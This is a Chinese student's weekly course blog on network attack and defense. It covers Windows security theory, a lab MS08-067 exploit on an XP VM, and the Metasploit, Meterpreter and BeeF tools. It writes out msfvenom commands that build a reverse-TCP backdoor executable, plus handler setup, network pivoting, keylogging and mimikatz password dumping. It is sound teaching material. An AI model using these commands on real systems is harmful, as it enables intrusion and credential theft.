• 20169212 2016-2017-2 《网络攻防实践》第七周学习总结


    20169212 2016-2017-2 《网络攻防实践》第七周学习总结

    教材学习内容总结

    本周学习了第七章内容,主要为Windows操作系统安全攻防。学习了操作系统的基本框架、基本结构,操作系统的安全体系结构与机制(身份认证机制、授权与访问控制机制、安全审计机制、其它机制)及远程安全攻防技术。远程安全攻防主要包括:系统的安全漏洞生命周期、远程口令猜测与破解、远程渗透攻击、本地安全攻防技术(本地提权、敏感信息窃取、远程控制及后门程序)。

    教材学习中的问题和解决过程

    MS08-067漏洞全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,可在中国国家信息安全漏洞库当中找到——CVE-2008-4250,也可在CVE官网找到相关信息。如果用户在受影响的系统上收到特制的 RPC(远程过程调用)请求,则该漏洞可能允许远程执行代码。Kali为攻击机(IP 192.168.8.115),Windows xp为靶机(IP 192.168.8.112)。
    利用漏洞获取shell过程如下:




    视频学习总结

    漏洞检索与利用

    漏洞利用工具集
    1.Exploit Database->searchsploit

    2.pattern create
    测试漏洞
    armitage
    结合MSF进行利用
    3.jboss-autopwn-linux/win
    专门针对Jboss的漏洞利用工具
    4.ikat
    自动化开启,等待目标访问中招。
    5.termineter
    评估智能电表的安全性。

    Metasploit基础

    1.启动介绍
    Kali漏洞工具集中的重要组成工具,使用时首先要开启两个服务PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。
    service postgresql start 无法启动,没有软件
    service metasploit start
    配置随系统启动
    update-rc.d postgresql enable
    update-rc.d metasploit enable
    2.路径介绍
    msf的路径cd /usr/share/metasploit-framework/
    msfencode -l 未找到命令

    3.基本命令
    msfpayload:用来生成payload或者shellcode
    搜索时候可以用msfpayload -l |grep “windows”这样的命令来查询
    -o选项可以列出payload所需的参数
    msfencode:msf中的编码器,早期为了编码绕过AV现在常用msfpayload与它编码避免exploit的坏字符串。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
    msfconsole:
    开启metasploit的console
    4.测试示例:发现漏洞,搜索exploit

    Metterpreter

    Metasploit中的很重要的模块,Metasploit框架中的一个拓展模块,作为溢出成功后的攻击载荷使用。
    常用的命令:
    background 将当前会话放置后台
    load/use 加载模块
    interact 切换进一个信道
    migrate 迁移进程
    run 执行一个已有的模块
    resource 执行一个已有的rc脚本,可以自定义
    生成meterpreter后门:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.125 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
    设置参数

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    show options
    set LPORT 2333
    

    设置成功后仍然无法使用,显示

    Metasploit后渗透测试

    1.查看跳板机的网卡
    ifconfig
    2.添加路由表
    run autoroute -s 10.0.0.1
    3.开socks代理

    background 把session置于后台
    search socks  使用socks开代理
    use auxiliary/server/socks4a
    showoptions
    exploit
    

    4.通过background和sessions -i可以自由切换进入session
    5.输入run可以看到在meterpreter上可以做的很多命令
    6.通过run post/可以看到后渗透测试的模块
    7.扫描内网信息
    run arp_scanner -r 目标IP地址
    内网端口转发
    upload lcx.exe c: 上传到C盘根目录

    BeeF

    对XSS漏洞的利用,BeeF是浏览器攻击框架的简称,专注于浏览器端的渗透工具。
    1.命令行下启动BeeF
    直接使用命令 beef-xss即可,打开浏览器,会自动跳转至beef登录页面:

    使用默认用户名beef和密码beef即可进入主界面:

    2.假设被测试主机由于XSS漏洞请求到
    测试利用:输入网址 http://127.0.0.1:3000/demod/basic.html,可以进入一个测试页面

    这样在主界面左端就可以看到一个在线主机:

    3.HOOK持续的时间为关闭测试页面为止,在此期间相当于被控制了,可以发送攻击命令,在Commands模块我们可以完成很多任务。有四种颜色表示,颜色不同代表攻击模块是否可用及隐蔽性强度。
    4.选取MISC测试:


    5.Proxy功能
    借助目标浏览器访问目标可以访问的地址。
    利用use as Proxy设定主机代理,在Rider选项中的Forge Request当中编辑要发送的内容

    信息发送后,可通过History选项看到,待传输成功后,点击相应的信息,即可显示详细的传输过程:

    6.BeeF与Metasploit结合加载
    修改文件config.yaml




    打开一个msfconsole


    可以看到Metasploit下面多了很多可以使用的模块。

    视频学习中的问题和解决过程

    问题1.Metasploit工具的使用中遇到问题

    在使用Metasploit工具之前需要打开 postgresql数据库服务和 metasploit 服务,但是出现了无法启动的错误。因为这个版本已经没有metasploit服务了,需要利用以下方法打开带数据库支持的MSF服务:

    etc/init.d/postgresql start 或者 service postgresql start  //启动postgresql数据库
    msfdb init         //初始化MSF数据库
    msfconsole
    db_status          //在msf中可以查看数据库连接状态
    

    下面就以SSH用户名枚举攻击对metasploit工具进行测试,首先靶机的IP地址是 192.168.8.125,然后通过之前学过的 nmap 对靶机所开放的端口服务版本进行探测

    接着就在已打开的msf中使用命令 search ssh,找寻msf所提供的关于ssh服务的工具:

    这里选择上图标记出的工具,进行ssh用户名枚举,接着利用命令 use使用该工具:

    设置密码文档:

    设置对应参数:

    使用exploit攻击:

    攻击成功。

    问题2.Meterpreter工具的使用出现问题

    发现在终端中输入msfpayload时,出现错误“bash: msfpayload: command not found”。网上找了一下,原来是从2015年6月8日之后,msfpayload已经被移除了。以后只要使用msfvenom就行了,它集成了msfpayload和msfencode的功能

    所以生成命令为:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.37.130 LPORT=2333 -i 5 -f exe > /root/door.exe
    

    生成成功,将其移入XP系统中。
    在kali的msf中执行exploit开始监听:

    当XP系统运行后门程序可以看到:

    然后开启键盘监听:

    使用 load mimikatz 进行目标机密码明文的抓取:


    上周考试错题总结

    1.下面哪些Linux命令可以ASCII码和16进制单字节方法输出Hello.java的内容(BC)
    A.od -b -tx1 Hello.java
    B.od -tcx1 Hello.java
    C.od -tc -tx1 Hello.java
    D.od -tbx1 Hello.java
    总结:od命令,用户通常使用od命令查看特殊格式的文件内容。通过指定该命令的不同选项可以以十进制、八进制、十六进制和ASCII码来显示文件。
    语法:od [选项] 文件…命令中各选项的含义:

    • A 指定地址基数,包括:
      d 十进制
      o 八进制(系统默认值)
      x 十六进制
      n 不打印位移值
    • t 指定数据的显示格式,主要的参数有:
      c ASCII字符或反斜杠序列
      d 有符号十进制数
      f 浮点数
      o 八进制(系统默认值为02)
      u 无符号十进制数
      x 十六进制数

    2.根据工作的网络协议层次,防火墙技术中工作网络层的是(AB)
    A.包过滤
    B.电路级网关
    C.应用层代理
    D.基于状态检测的包过滤
    总结:电路级网关在传输层,应用层代理在应用层,基于状态的包过滤涉及到传输层。

    学习进度条

    学习目标(本学期)

    完成网络攻防书本及视频的学习,完成各种攻防实践作业。

    第二周进度

    学习教材《网络攻防技术与实践》第一章和第二章;学习kali视频5个;查找了解了两个网络安全工具;查找两个黑客资料。

    第三周进度

    学习视频6-10;学习课本第三章;完成第三章课后作业。

    第四周进度

    网络嗅探的理论与工具;网络协议分析的理论与工具。

    第五周进度

    学习视频5个;学习教材最后一部分。

    第六周进度

    学习视频5个(21-25);学习教材第五、六章。

    第七周进度

    学习视频5个(26-30);学习教材第七章。

    上周目标完成情况

    完成

    改进情况

    注重实践学习,注意解决问题。

    感想体会

    本周的实验做成功后感觉很开心,获得了很多知识。扫描后得到漏洞,利用漏洞进行攻击获取权限,很感兴趣。

    本周学习计划

    课本七章学习:5小时
    kali视频16-20:7小时
    教材实践:2小时
    整理写博客:2小时

    参考资料

    网络攻防技术与实践

  • 相关阅读:
    Gerrit 系统初探 (已转移到 https://steemit.com/gerrit/@linvictor88/gerrit )
    Iaas概述
    题解西电OJ (Problem 1007 -做一名正气的西电人 )--长整型计算
    题解西电OJ (Problem 1005 -跳舞毯)--动态规划
    题解西电OJ (Problem 1004 -亚特兰提斯)--最小生成树
    题解西电OJ (Problem 1003 -最喜欢的数字)--动态规划
    题解西电OJ (Problem 1008
    题解西电OJ (Problem 1006
    HTML-css selector
    Android--应用开发3(Android layout XML属性)
  • 原文地址:https://www.cnblogs.com/Jarvan210/p/6699229.html
Copyright © 2020-2023  润新知